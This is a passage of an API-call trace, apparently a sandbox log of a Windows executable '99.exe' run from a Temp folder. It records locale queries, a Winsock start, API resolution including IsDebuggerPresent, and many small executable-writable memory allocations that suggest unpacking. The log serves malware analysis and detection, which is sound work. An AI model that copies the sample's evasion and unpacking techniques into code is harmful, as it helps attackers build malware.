lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0279.422] GetCurrentThreadId () returned 0xb80 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffdc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffdb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffd9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffda, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffd8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffd7, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.425] LoadStringA (in: hInstance=0x280000, uID=0xffd6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffd3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffd2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffd1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffea, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffeb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffec, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe5, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe4, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffe0, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xffff, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfffe, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfffd, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfffc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfffb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfffa, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.426] LoadStringA (in: hInstance=0x280000, uID=0xfff9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.429] LoadStringA (in: hInstance=0x280000, uID=0xfff7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.429] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0xcae6b8 [0279.430] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2e0000 [0279.430] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0xcaf6b8 [0279.430] VirtualAlloc (lpAddress=0x2e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e0000 [0279.430] LoadStringA (in: hInstance=0x280000, uID=0xffe7, lpBuffer=0x18fa9c, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0279.433] GetThreadLocale () returned 0x409 [0279.433] GetSystemMetrics (nIndex=74) returned 0 [0279.543] GetSystemMetrics (nIndex=42) returned 0 [0279.547] GetThreadLocale () returned 0x409 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jan") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd04, cchData=256 | out: lpLCData="January") returned 8 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Feb") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd04, cchData=256 | out: lpLCData="February") returned 9 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mar") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="March") returned 6 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Apr") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="April") returned 6 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="May") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jun") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="June") returned 5 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Jul") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="July") returned 5 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Aug") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="August") returned 7 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sep") returned 4 [0279.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd04, cchData=256 | out: lpLCData="September") returned 10 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Oct") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd04, cchData=256 | out: lpLCData="October") returned 8 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Nov") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd04, cchData=256 | out: lpLCData="November") returned 9 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Dec") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd04, cchData=256 | out: lpLCData="December") returned 9 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sun") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sunday") returned 7 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mon") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Monday") returned 7 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tue") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tuesday") returned 8 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wed") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wednesday") returned 10 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thu") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thursday") returned 9 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Fri") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Friday") returned 7 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sat") returned 4 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Saturday") returned 9 [0279.548] GetThreadLocale () returned 0x409 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd60, cchData=256 | out: lpLCData="$") returned 2 [0279.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0279.551] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe58, cchData=2 | out: lpLCData=".") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd60, cchData=256 | out: lpLCData="2") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe58, cchData=2 | out: lpLCData="/") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd60, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0279.552] GetThreadLocale () returned 0x409 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd60, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0279.552] GetThreadLocale () returned 0x409 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe58, cchData=2 | out: lpLCData=":") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd60, cchData=256 | out: lpLCData="AM") returned 3 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd60, cchData=256 | out: lpLCData="PM") returned 3 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0279.552] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0279.552] GetVersionExA (in: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2e030c, dwMinorVersion=0x2e02fc, dwBuildNumber=0x30, dwPlatformId=0x2822c9, szCSDVersion="Äþ\x18") | out: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0279.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.552] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a448ef [0279.564] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x18fd40 | out: lpWSAData=0x18fd40) returned 0 [0279.704] GetCurrentThreadId () returned 0xb80 [0279.708] VirtualAlloc (lpAddress=0x2e4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2e4000 [0279.846] GetLocalTime (in: lpSystemTime=0x18feb8 | out: lpSystemTime=0x18feb8*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x17, wMinute=0xc, wSecond=0xd, wMilliseconds=0x224)) [0279.846] GetSystemTime (in: lpSystemTime=0x18feb4 | out: lpSystemTime=0x18feb4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xc, wSecond=0xd, wMilliseconds=0x224)) [0279.852] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xc8 [0279.852] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.853] GetCurrentProcess () returned 0xffffffff [0279.853] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc | out: lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc) returned 1 [0279.861] VirtualAlloc (lpAddress=0x308000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x308000 [0279.870] VirtualFree (lpAddress=0x328000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0280.093] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceA") returned 0x769de98b [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0280.094] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0280.095] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0280.095] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76c20000 [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0280.095] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0280.095] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0280.096] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0280.096] VirtualAlloc (lpAddress=0x328000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x328000 [0280.103] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x3e0000 [0280.103] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000 [0280.104] VirtualAlloc (lpAddress=0x0, dwSize=0x83, flAllocationType=0x1000, flProtect=0x40) returned 0x9c0000 [0280.104] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x9d0000 [0280.104] VirtualAlloc (lpAddress=0x0, dwSize=0x437, flAllocationType=0x1000, flProtect=0x40) returned 0x9e0000 [0280.104] VirtualAlloc (lpAddress=0x0, dwSize=0x1c9, flAllocationType=0x1000, flProtect=0x40) returned 0x9f0000 [0280.104] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0xa00000 [0280.105] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0xa10000 [0280.105] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0xc30000 [0280.105] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0xc40000 [0280.106] GetCurrentProcessId () returned 0xb7c [0280.106] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0280.106] VirtualAlloc (lpAddress=0x0, dwSize=0xbf, flAllocationType=0x1000, flProtect=0x40) returned 0xc60000 [0280.106] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0xc70000 [0280.106] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0xc80000 [0280.106] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2540000 [0280.107] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x2550000 [0280.107] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x1000, flProtect=0x40) returned 0x2560000 [0280.107] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2570000 [0280.107] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2580000 [0280.108] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x1000, flProtect=0x40) returned 0x2590000 [0280.108] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x25a0000 [0280.108] VirtualAlloc (lpAddress=0x350000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0280.108] GetCurrentProcessId () returned 0xb7c [0280.108] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x25b0000 [0280.109] VirtualAlloc (lpAddress=0x0, dwSize=0x284, flAllocationType=0x1000, flProtect=0x40) returned 0x25c0000 [0280.109] VirtualAlloc (lpAddress=0x0, dwSize=0x37d, flAllocationType=0x1000, flProtect=0x40) returned 0x25d0000 [0280.109] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x25e0000 [0280.109] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x1000, flProtect=0x40) returned 0x25f0000 [0280.110] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x2600000 [0280.110] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2610000 [0280.110] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2620000 [0280.110] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2630000 [0280.110] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2640000 [0280.111] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x2650000 [0280.111] GetCurrentProcessId () returned 0xb7c [0280.111] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2660000 [0280.111] VirtualAlloc (lpAddress=0x0, dwSize=0x149, flAllocationType=0x1000, flProtect=0x40) returned 0x2670000 [0280.111] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2680000 [0280.112] VirtualAlloc (lpAddress=0x0, dwSize=0x11d, flAllocationType=0x1000, flProtect=0x40) returned 0x2690000 [0280.112] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x26a0000 [0280.112] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x26b0000 [0280.112] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x26c0000 [0280.113] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x26d0000 [0280.113] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x26e0000 [0280.113] VirtualAlloc (lpAddress=0x0, dwSize=0x3b1, flAllocationType=0x1000, flProtect=0x40) returned 0x26f0000 [0280.113] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x2700000 [0280.114] GetCurrentProcessId () returned 0xb7c [0280.114] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2710000 [0280.114] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2720000 [0280.114] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2730000 [0280.115] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2740000 [0280.115] VirtualAlloc (lpAddress=0x0, dwSize=0x1df, flAllocationType=0x1000, flProtect=0x40) returned 0x2750000 [0280.115] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2760000 [0280.115] VirtualAlloc (lpAddress=0x0, dwSize=0x189, flAllocationType=0x1000, flProtect=0x40) returned 0x2770000 [0280.115] VirtualAlloc (lpAddress=0x0, dwSize=0x483, flAllocationType=0x1000, flProtect=0x40) returned 0x2780000 [0280.116] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2790000 [0280.116] VirtualAlloc (lpAddress=0x0, dwSize=0x247, flAllocationType=0x1000, flProtect=0x40) returned 0x27a0000 [0280.116] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x27b0000 [0280.116] GetCurrentProcessId () returned 0xb7c [0280.117] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x27c0000 [0280.117] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x1000, flProtect=0x40) returned 0x27d0000 [0280.117] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x27e0000 [0280.117] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x27f0000 [0280.118] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2800000 [0280.118] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2810000 [0280.118] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2820000 [0280.118] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x1000, flProtect=0x40) returned 0x2830000 [0280.119] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x1000, flProtect=0x40) returned 0x2840000 [0280.119] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2850000 [0280.119] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2860000 [0280.119] GetCurrentProcessId () returned 0xb7c [0280.119] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2870000 [0280.120] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2880000 [0280.120] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2890000 [0280.121] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x28a0000 [0280.121] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x28b0000 [0280.122] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x28c0000 [0280.122] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x28d0000 [0280.122] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x28e0000 [0280.122] VirtualAlloc (lpAddress=0x0, dwSize=0x17e, flAllocationType=0x1000, flProtect=0x40) returned 0x28f0000 [0280.123] VirtualAlloc (lpAddress=0x0, dwSize=0x1b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2900000 [0280.123] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2910000 [0280.123] VirtualAlloc (lpAddress=0x354000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x354000 [0280.124] GetCurrentProcessId () returned 0xb7c [0280.124] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2920000 [0280.124] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x1000, flProtect=0x40) returned 0x2930000 [0280.124] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2940000 [0280.124] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2950000 [0280.125] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2960000 [0280.125] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2970000 [0280.125] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, 